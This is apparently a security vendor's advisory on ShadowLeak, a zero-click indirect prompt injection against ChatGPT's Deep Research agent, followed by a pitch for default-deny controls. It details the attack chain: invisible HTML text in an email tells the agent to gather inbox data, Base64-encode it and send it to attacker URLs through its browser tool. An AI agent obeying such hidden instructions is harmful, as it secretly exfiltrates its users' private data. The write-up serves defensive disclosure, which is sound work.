ShadowLeak: The Zero-Click Attack That Steals Data Through ChatGPT

How a Hidden Email Turned an AI Agent into a Silent Data Exfiltration Tool

Date: February 18, 2026 Primary Source: Radware Threat Advisory — ShadowLeak

ShadowLeak zero-click data exfiltration through ChatGPT Deep Research

Executive Summary

What: ShadowLeak is a zero-click, service-side indirect prompt injection vulnerability in OpenAI's ChatGPT Deep Research agent that silently exfiltrates data from connected accounts (Gmail, Drive, Outlook, SharePoint)
Who is affected: All ChatGPT users with connected accounts — OpenAI reported 5 million paying business users before the fix
Severity: High — achieved 100% success rate in testing; invisible to all endpoint and network defenses
Status: Patched by OpenAI (August 2025); not exploited in the wild
Action required: Audit AI agent connectors, limit agent permissions, and apply Zero-Trust positive controls to data sources, models, and tools

🧠 Overview

Radware's Security Research Center has disclosed ShadowLeak — the first known zero-click, service-side indirect prompt injection vulnerability in OpenAI's ChatGPT Deep Research agent. The vulnerability allowed an attacker to silently exfiltrate personal data from a victim's connected accounts — Gmail, Google Drive, Outlook, SharePoint, and others — without the victim clicking anything, seeing any indication of compromise, or leaving any trace on their local network. (Radware, Security Affairs)

Unlike previously disclosed AI prompt injection attacks (such as AgentFlayer and EchoLeak) that relied on client-side image rendering to trigger exfiltration, ShadowLeak operates entirely within OpenAI's cloud infrastructure. That means the data theft is invisible to endpoint security tools, firewalls, DLP solutions, and EDR platforms. The victim's machine never touches the stolen data. (Infosecurity Magazine)

With OpenAI reporting 5 million paying business users on ChatGPT, the potential exposure was massive before the fix was deployed.

🔍 Threat Summary

Field	Detail
Vulnerability Name	ShadowLeak
CVE ID(s)	None assigned
CVSS Score	Not rated (no CVE)
Affected Product	OpenAI ChatGPT Deep Research agent (with connected accounts)
Attack Vector	Network — indirect prompt injection via email
Exploited in the Wild	No (per Radware)
Patch Available	Yes — OpenAI deployed fix by early August 2025; confirmed resolved September 3, 2025
Discovered By	Gabi Nakibly & Zvika Babo (co-leads), Maor Uziel (contributor) — Radware

🔬 Technical Analysis

How the Attack Works

ShadowLeak exploits the fundamental inability of large language models to distinguish between trusted system instructions and untrusted user-supplied content — a class of vulnerability known as indirect prompt injection. For a practical demonstration of how hidden prompt injection manipulates an AI shopping agent into overpaying for purchases and potentially exfiltrating PII, see Securing AI Agents: How to Prevent Hidden Prompt Injection Attacks (at 3:54).

The attack chain proceeds as follows:

Attacker crafts a malicious email with a benign-looking subject line (e.g., "Restructuring Package — Action Items"). The email body contains hidden prompt injection commands embedded in the HTML using obfuscation techniques — white-on-white text, microscopic fonts, or hidden CSS styling — that are invisible to the human reader but readable by the AI agent. (Security Affairs, Infosecurity Magazine)
Victim asks Deep Research to process their inbox — for example, "Summarize today's emails" or "Research the topics in my recent messages." The agent connects to Gmail (or another integrated service) and begins reading messages. (The Record)
The agent ingests the booby-trapped email. Because Deep Research cannot distinguish between legitimate email content and injected instructions, it treats the hidden commands as part of its task. (Infosecurity Magazine)
The agent extracts PII from the victim's inbox — full names, addresses, email contents, metadata, and any other data accessible through connected services (Google Drive, Dropbox, SharePoint, Teams, Outlook). (Security Affairs)
Data is encoded in Base64 and exfiltrated via the agent's built-in browser.open() tool, which makes HTTP requests to attacker-controlled URLs with the stolen data injected as URL parameters. The hidden instructions even tell the agent to "retry several times" to ensure delivery. (Infosecurity Magazine)
Exfiltration completes entirely on OpenAI's servers. No data passes through the victim's browser, endpoint, or network. There are no client-side artifacts, no suspicious DNS queries, no unusual outbound connections — nothing for local defenses to detect. (Security Affairs)

Payload and Impact

ShadowLeak is a data exfiltration attack. It does not deliver malware to the endpoint. The "payload" is the silent theft of PII and business data from any service connected to the ChatGPT agent:

Email content and metadata (Gmail, Outlook)
Documents and files (Google Drive, Dropbox, SharePoint)
Messages (Teams, Slack via connectors)
CRM and project data (HubSpot, Notion)
Code repositories (GitHub)
Meeting invitations, contracts, customer records

In Radware's testing, the attack achieved a 100% success rate in exfiltrating Gmail data. (Infosecurity Magazine)

⚠️ Why Traditional Defenses Struggle

ShadowLeak is specifically designed to be invisible to every layer of traditional endpoint and network security:

Endpoint Detection & Response (EDR): No malicious process executes on the victim's machine. There is nothing to detect. The agent runs on OpenAI's servers, not locally.
Firewalls and Network Monitoring: The exfiltration traffic originates from OpenAI's cloud infrastructure, not from the victim's network. No suspicious outbound connections appear in network logs.
Data Loss Prevention (DLP): DLP tools monitor data leaving the organization's perimeter. ShadowLeak exfiltrates data that is already in a cloud service (Gmail), routed through another cloud service (OpenAI), to a third-party URL — entirely outside the organization's visibility.
Email Security Gateways: The malicious email contains no attachments, no links, no macros — just invisible HTML text. There is no payload for sandboxes to detonate and no URL reputation to check.
Signature-Based AV / Behavioral Heuristics: There is no file to scan. There is no executable. The "malware" is a text string hidden in an email, interpreted by an AI model running on someone else's servers.

This is the core challenge: the attack surface has moved from the endpoint to the AI service provider's infrastructure, and traditional security tools have zero visibility into that layer.

🛡 How White Cloud Security Trust Lockdown Addresses This Threat

Zero-Trust AI Security: Positive Controls, Not Blacklists

The instinctive response to ShadowLeak is to try to filter out malicious prompts — scanning emails for hidden text, blacklisting injection patterns, or building ever-larger lists of "bad" prompt strings. That approach is doomed for the same reason signature-based AV is doomed: attackers will always find new patterns faster than defenders can catalog them.

Zero-Trust AI security is not about blacklisting prompts or data. It is about providing positive controls over three things: the data sources an agent can access, the models it can invoke, and the tools it can use to interact with the real or cyber world.

This is the same architectural insight that makes WCS Trust Lockdown effective at the endpoint. WCS does not try to identify every malicious executable — it positively approves every executable that is authorized to run. Everything else is denied by default. The same model applies to AI agents:

Control Layer	Endpoint (WCS Trust Lockdown)	AI Agent (Zero-Trust AI)
What can execute	Only handprint-verified, admin-approved software	Only admin-approved models and agent configurations
What data can be accessed	File-level access governed by OS + trust policy	Only explicitly authorized data connectors (not "all of Gmail")
What tools can be used	Only approved executables, DLLs, and scripts	Only approved agent tools — no `browser.open()` to arbitrary URLs without policy
What can leave the perimeter	Controlled by trust policy + egress rules	Controlled by approved output channels — no silent HTTP exfiltration

Mapping Positive Controls to the ShadowLeak Kill Chain

Here's how positive controls — not blacklists — stop each stage of this attack:

Attack Step	Positive Control
1. Malicious email arrives	Data source control: The agent should only ingest data from admin-approved sources and mailboxes, not the entire inbox by default. Connectors are opt-in, not opt-out.
2. AI agent reads inbox	Least-privilege scope: The agent's read access should be limited to specific folders, labels, or senders relevant to the current task — not every message ever received.
3. Agent executes hidden instructions	Tool authorization: The agent's available tools (browser, file access, API calls) are governed by an explicit allow-list — just as WCS governs which executables can run. If `browser.open()` isn't on the approved tool list, the injected command fails silently.
4. Data exfiltration via URL	Output channel control: The agent can only send data to admin-approved destinations. Outbound HTTP to unknown URLs is denied by default — no blacklist required.

The Broader Lesson: Default-Deny for Agents

WCS Trust Lockdown uses handprint identity (multi-hash + file length) to positively verify every executable before it runs. The same philosophy — explicitly approve what is allowed, deny everything else — is the only viable security model for AI agents:

Approve the data sources. Don't let agents browse everything — grant access to specific repositories, mailboxes, and services on a per-task basis.
Approve the models. Control which AI models your organization permits and how they are configured. Not every task requires an agent with tool-use capabilities.
Approve the tools. An AI agent's ability to open URLs, write files, send messages, or call APIs should be governed by policy — not left open by default.

This is not theoretical. It is the same default-deny principle that has protected WCS Trust Lockdown customers from every ransomware variant, every zero-day exploit, and every supply chain attack that depends on executing unauthorized code. The principle scales from executables to agents.

"At White Cloud Security, we continue to track and report new hacking methods and tools — not just because of its immediate threat, but because patterns of reuse often expose the playbooks of these cybercriminal groups."

ShadowLeak is a warning: as organizations adopt AI agents with deep access to business data, blacklisting bad prompts is not a security strategy. Positive control over data sources, models, and tools is. Default-deny is not just for executables — it's the architecture that works wherever autonomous actions occur.

🔧 Recommended Mitigations

For Organizations Using ChatGPT or AI Agents

Audit connected services: Review which accounts and data sources are connected to AI agents. Disable connectors that are not actively needed.
Limit agent permissions: Where possible, restrict AI agents to read-only access and disable tool capabilities (like browser.open()) that are not required for your use case.
Monitor agent activity: Implement logging and monitoring of AI agent actions. Track what data is accessed and what external requests are made.
Educate users: Ensure employees understand that asking an AI agent to "summarize my inbox" grants it access to every message — including potentially malicious ones.

For AI Platform Providers

Normalize and strip invisible content: Before processing emails or documents, strip white-on-white text, microscopic fonts, hidden CSS, and other obfuscation techniques. (Security Affairs)
Implement agent intent validation: Continuously verify that agent actions remain consistent with the user's original request. (Security Affairs)
Default-deny for agent tool use: Require explicit user confirmation before agents make outbound HTTP requests to URLs not in the original task scope.

For Endpoint Security (WCS Trust Lockdown)

Maintain default-deny posture: ShadowLeak does not deliver endpoint malware, but the techniques it uses (prompt injection, social engineering) will inevitably be combined with endpoint payloads. A default-deny posture ensures that even if an AI-assisted attack chain eventually drops an executable, it cannot run without explicit approval.
Monitor for follow-on attacks: Data stolen via ShadowLeak (credentials, internal documents, org charts) can fuel targeted endpoint attacks. Ensure Trust Lockdown policies are current and all endpoints are protected.

📌 Key Takeaways

ShadowLeak is the first zero-click, service-side prompt injection attack against ChatGPT, capable of silently exfiltrating data from Gmail, Drive, Outlook, SharePoint, and other connected services with a 100% success rate in testing.
Traditional endpoint and network defenses cannot detect it because the entire attack — from ingestion to exfiltration — happens within OpenAI's cloud infrastructure, leaving zero artifacts on the victim's machine or network.
The attack exploits a fundamental LLM limitation: the inability to distinguish trusted instructions from untrusted content — meaning every AI agent that processes external data is potentially vulnerable to similar techniques.
Zero-Trust AI security means positive controls, not blacklists. Trying to filter malicious prompts is a losing game. Organizations need default-deny governance over the data sources agents can access, the models they can invoke, and the tools they can use — the same architecture that makes WCS Trust Lockdown effective at the endpoint.